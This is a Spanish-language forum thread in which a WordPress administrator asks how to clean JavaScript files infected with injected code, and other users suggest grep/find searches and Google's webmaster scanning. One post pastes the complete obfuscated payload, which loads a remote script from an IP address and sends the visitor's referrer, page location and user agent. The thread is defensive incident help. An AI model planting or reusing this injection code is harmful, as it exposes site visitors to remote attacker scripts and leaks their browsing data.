Foros del Web » Administración de Sistemas » Unix / Linux »

Archivos *.js infectados con código malicioso

Estas en el tema de Archivos *.js infectados con código malicioso en el foro de Unix / Linux en Foros del Web. Hola a todos! Aprovecho para presentarme por que soy novato en el foro. Soy Osowaken, administrador de la web www.antesmuertoqueserunzombi.es una web dedicada al cine ...
  #1 (permalink)  
Antiguo 16/02/2012, 07:42
 
Fecha de Ingreso: febrero-2012
Mensajes: 2
Antigüedad: 12 años, 10 meses
Puntos: 0
Archivos *.js infectados con código malicioso

Hola a todos!

Aprovecho para presentarme por que soy novato en el foro. Soy Osowaken, administrador de la web www.antesmuertoqueserunzombi.es una web dedicada al cine fantástico y de terror entre otros muchas temáticas!

El caso es que nuestra web esta alojada en un servidor compartido de 1and1 y corre sobre Wordpress 3.3.1

El tema es que hemos sufrido muchos ataques y los dos últimos consisten en que nos han infectado con código malicioso todos los archivos *.js

Además de que es una chapa ir buscando archivo a archivo dentro del server todos los archivos que son de javascript y borrando uno a uno las líneas de código malicioso, me gustaría saber como puedo encontrar el script que se encarga de despertar a este troyano que se propaga por dentro del server que da miedo...

No sé que troyano es, por que no aparece en todos los antivirus, es más solo canta en el Avast y en Nod32.... y simplemente aparece una página web que te enlaza al dominio "psilondesig.osa.pl" y que google te advierte que tiene código chungo... Estoy desesperado por que no hago otra cosa que incrementar la seguridad en la web pero al final los resultados son nefastos....

Alguien podría echarme un cable?

Muchas gracias por vuestra atención!

Un saludo
  #2 (permalink)  
Antiguo 16/02/2012, 08:40
AlvaroG
Invitado
 
Mensajes: n/a
Puntos:
Respuesta: Archivos *.js infectados con código malicioso

Pues con acceso ssh deberías poder encontrar las cadenas de texto que están en esos archivos (con grep).

grep -R lo_que_buscas *.js

Si el código malicioso no está ofuscado, quizás una búsqueda por el dominio "psilondesig.osa.pl" te de resultados. Si está ofuscado, aún podrías tener alguna oportunidad buscando llamadas a "eval", ya que usualmente no es usado por código "buenicioso" :D

find /carpeta/ -name "*.js" -exec grep eval {} +

debería devolverte todas las líneas conteniendo "eval" en todos los archivos javascript dentro de /carpeta

Saludos y suerte!
  #3 (permalink)  
Antiguo 16/02/2012, 13:25
 
Fecha de Ingreso: febrero-2012
Mensajes: 2
Antigüedad: 12 años, 10 meses
Puntos: 0
Respuesta: Archivos *.js infectados con código malicioso

Cita:
Iniciado por AlvaroG Ver Mensaje
Pues con acceso ssh deberías poder encontrar las cadenas de texto que están en esos archivos (con grep).

grep -R lo_que_buscas *.js

Si el código malicioso no está ofuscado, quizás una búsqueda por el dominio "psilondesig.osa.pl" te de resultados. Si está ofuscado, aún podrías tener alguna oportunidad buscando llamadas a "eval", ya que usualmente no es usado por código "buenicioso" :D

find /carpeta/ -name "*.js" -exec grep eval {} +

debería devolverte todas las líneas conteniendo "eval" en todos los archivos javascript dentro de /carpeta

Saludos y suerte!
Hey! muchas gracias por la respuesta.... Luego intentaré buscarlo a ver que puedo hacer así!
El caso es que sigo borrando el contenido de los archivos *.js de forma manual....
El código que aparece dentro de cada *.js es el siguiente:

Código:
var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ;
A alguien le a sucedido algo por el estilo?

Gracias a todos!
  #4 (permalink)  
Antiguo 16/02/2012, 13:55
AlvaroG
Invitado
 
Mensajes: n/a
Puntos:
Respuesta: Archivos *.js infectados con código malicioso

Bueno, creo que no hay eval() allí, jeje, pero podés usar 0x80d0 como término de búsqueda, después de todo no creo que lo hayas usado en tu código


Saludos.
  #5 (permalink)  
Antiguo 16/02/2012, 16:49
Avatar de Lecquio  
Fecha de Ingreso: mayo-2004
Ubicación: Asturias, España
Mensajes: 948
Antigüedad: 20 años, 7 meses
Puntos: 34
Respuesta: Archivos *.js infectados con código malicioso

A mi me ha pasado en alguna web y la forma más fácil y rápida de localizar el código malicioso es dar de alta tu página en google webmaster. Te hace un análisis de la página y te dice cuales son todos los ficheros infectados y el código que sobra para que puedas localizarlo todo facilmente.

Etiquetas: javascript, troyanos, wordpress
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 20:56.